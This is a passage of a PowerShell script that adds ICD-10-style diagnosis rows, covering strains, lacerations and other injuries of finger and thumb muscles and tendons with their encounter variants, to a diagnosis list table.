finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of right middle finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of right middle finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of left middle finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of left middle finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of left middle finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of left middle finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of left middle finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of left middle finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of right ring finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of right ring finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of right ring finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of right ring finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of right ring finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of right ring finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of left ring finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of left ring finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of left ring finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of left ring finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of left ring finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of left ring finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of right little finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of right little finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of right little finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of right little finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of right little finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of right little finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of left little finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of left little finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of left little finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of left little finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of left little finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of left little finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of other finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of other finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of other finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of other finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of other finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of other finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of unspecified finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of unspecified finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of unspecified finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of unspecified finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of unspecified finger at wrist and hand level","Strain of extensor muscle, fascia and tendon of unspecified finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of right index finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of right index finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of right index finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of right index finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of right index finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of right index finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of left index finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of left index finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of left index finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of left index finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of left index finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of left index finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of right middle finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of right middle finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of right middle finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of right middle finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of right middle finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of right middle finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of left middle finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of left middle finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of left middle finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of left middle finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of left middle finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of left middle finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of right ring finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of right ring finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of right ring finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of right ring finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of right ring finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of right ring finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of left ring finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of left ring finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of left ring finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of left ring finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of left ring finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of left ring finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of right little finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of right little finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of right little finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of right little finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of right little finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of right little finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of left little finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of left little finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of left little finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of left little finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of left little finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of left little finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of other finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of other finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of other finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of other finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of other finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of other finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of unspecified finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of unspecified finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of unspecified finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of unspecified finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of unspecified finger at wrist and hand level","Laceration of extensor muscle, fascia and tendon of unspecified finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of right index finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of right index finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of right index finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of right index finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of right index finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of right index finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of left index finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of left index finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of left index finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of left index finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of left index finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of left index finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of right middle finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of right middle finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of right middle finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of right middle finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of right middle finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of right middle finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of left middle finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of left middle finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of left middle finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of left middle finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of left middle finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of left middle finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of right ring finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of right ring finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of right ring finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of right ring finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of right ring finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of right ring finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of left ring finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of left ring finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of left ring finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of left ring finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of left ring finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of left ring finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of right little finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of right little finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of right little finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of right little finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of right little finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of right little finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of left little finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of left little finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of left little finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of left little finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of left little finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of left little finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of other finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of other finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of other finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of other finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of other finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of other finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of unspecified finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of unspecified finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of unspecified finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of unspecified finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of unspecified finger at wrist and hand level","Other injury of extensor muscle, fascia and tendon of unspecified finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of right thumb at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of right thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of right thumb at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of right thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of right thumb at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of right thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of left thumb at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of left thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of left thumb at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of left thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of left thumb at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of left thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of unspecified thumb at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of unspecified thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of unspecified thumb at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of unspecified thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of unspecified thumb at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of unspecified thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of right thumb at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of right thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of right thumb at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of right thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of right thumb at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of right thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of left thumb at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of left thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of left thumb at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of left thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of left thumb at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of left thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of unspecified thumb at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of unspecified thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of unspecified thumb at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of unspecified thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of unspecified thumb at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of unspecified thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of right thumb at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of right thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of right thumb at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of right thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of right thumb at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of right thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of left thumb at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of left thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of left thumb at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of left thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of left thumb at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of left thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of unspecified thumb at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of unspecified thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of unspecified thumb at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of unspecified thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of intrinsic muscle, fascia and tendon of unspecified thumb at wrist and hand level","Laceration of intrinsic muscle, fascia and tendon of unspecified thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of intrinsic muscle, fascia and tendon of right thumb at wrist and hand level","Other specified injury of intrinsic muscle, fascia and tendon of right thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of intrinsic muscle, fascia and tendon of right thumb at wrist and hand level","Other specified injury of intrinsic muscle, fascia and tendon of right thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of intrinsic muscle, fascia and tendon of right thumb at wrist and hand level","Other specified injury of intrinsic muscle, fascia and tendon of right thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of intrinsic muscle, fascia and tendon of left thumb at wrist and hand level","Other specified injury of intrinsic muscle, fascia and tendon of left thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of intrinsic muscle, fascia and tendon of left thumb at wrist and hand level","Other specified injury of intrinsic muscle, fascia and tendon of left thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of intrinsic muscle, fascia and tendon of left thumb at wrist and hand level","Other specified injury of intrinsic muscle, fascia and tendon of left thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of intrinsic muscle, fascia and tendon of unspecified thumb at wrist and hand level","Other specified injury of intrinsic muscle, fascia and tendon of unspecified thumb at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of intrinsic muscle, fascia and tendon of unspecified thumb at wrist and hand level","Other specified injury of intrinsic muscle, fascia and tendon of unspecified thumb at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of intrinsic muscle, fascia and tendon of unspecified thumb at wrist and hand level","Other specified injury of intrinsic muscle, fascia and tendon of unspecified thumb at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of right index finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of right index finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of right index finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of right index finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of right index finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of right index finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of left index finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of left index finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of left index finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of left index finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of left index finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of left index finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of right middle finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of right middle finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of right middle finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of right middle finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of right middle finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of right middle finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of left middle finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of left middle finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of left middle finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of left middle finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of left middle finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of left middle finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of right ring finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of right ring finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of right ring finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of right ring finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of right ring finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of right ring finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of left ring finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of left ring finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of left ring finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of left ring finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of left ring finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of left ring finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of right little finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of right little finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of right little finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of right little finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of right little finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of right little finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of left little finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of left little finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of left little finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of left little finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of left little finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of left little finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of other finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of other finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of other finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of other finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of other finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of other finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of unspecified finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of unspecified finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of unspecified finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of unspecified finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of intrinsic muscle, fascia and tendon of unspecified finger at wrist and hand level","Unspecified injury of intrinsic muscle, fascia and tendon of unspecified finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of right index finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of right index finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of right index finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of right index finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of right index finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of right index finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of left index finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of left index finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of left index finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of left index finger at wrist and hand level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of left index finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of left index finger at wrist and hand level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of right middle finger at wrist and hand level","Strain of intrinsic muscle, fascia and tendon of right middle finger at wrist and hand level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of intrinsic muscle, fascia and tendon of right middle finger 